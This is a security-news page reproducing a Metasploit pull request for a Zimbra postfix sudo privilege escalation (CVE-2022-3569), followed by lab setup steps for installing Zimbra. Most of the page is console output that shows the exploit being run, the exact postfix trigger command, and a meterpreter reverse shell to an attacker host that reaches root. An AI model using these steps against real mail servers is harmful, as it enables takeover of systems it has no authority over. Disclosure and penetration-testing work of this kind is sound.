Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-3569: Check in zimbra_postfix_priv_esc.rb by rbowes-r7 · Pull Request #17141 · rapid7/metasploit-framework

Due to an issue with incorrect sudo permissions, Zimbra Collaboration Suite (ZCS) suffers from a local privilege escalation issue in versions 9.0.0 and prior, where the ‘zimbra’ user can effectively coerce postfix into running arbitrary commands as 'root’.

CVE
Open in Source
#linux#red_hat#js

Verification

List the steps needed to make sure this thing works

  • Start msfconsole

  • Get a session as the zimbra user somehow (I used exploit/linux/http/zimbra_cpio_cve_2022_41352, which isn’t merged yet, but any way to get a shell is fine)

  • use exploit/linux/local/zimbra_postfix_priv_esc

  • set SESSION <session>

  • exploit

  • Should give you root!

    msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l

    Active sessions

    Id Name Type Information Connection

    1 meterpreter x64/linux zimbra @ mail.example.org 172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)

    msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc [*] Using configured payload linux/x64/meterpreter/reverse_tcp msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1 SESSION => 1 msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit

    [] Started reverse TCP handler on 172.16.166.147:4444 [] Running automatic check (“set AutoCheck false” to disable) [] Sending stage (3045348 bytes) to 172.16.166.157 [] Executing: sudo -n -l [+] The target appears to be vulnerable. [] Creating exploit directory: /tmp/.GPjXSraCDY [] Writing ‘/tmp/.GPjXSraCDY/.qjSY8’ (250 bytes) … [] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8 [] Sending stage (3045348 bytes) to 172.16.166.157 [+] Deleted /tmp/.GPjXSraCDY [*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700

    meterpreter > getuid Server username: root

Instructions for installing Zimbra

(Adapted from @cdelafuente-r7’s original install way back like two months ago)

Create a VM

HDD = 128gb
Memory/etc don't matter

I installed a local DNS server (note: replace <ip> with the host’s actual ip) (other note: replace apt with yum to do this on a Red Hat-derived system):

sudo apt update && sudo apt install dnsmasq
sudo hostnamectl set-hostname mail.example.org
echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf

Configure the host to use it:

sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo killall dnsmasq
sudo systemctl restart dnsmasq
echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf

Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you’ll have to sell your soul and opt-in to spam, but they don’t validate your email.

tar -xvvzf zcs-*.tgz
cd zcs*
sudo ./install.sh

* Lots of <enter>
* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
* Yes change the system
* Setup the admin password, probably turn off auto-updates

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE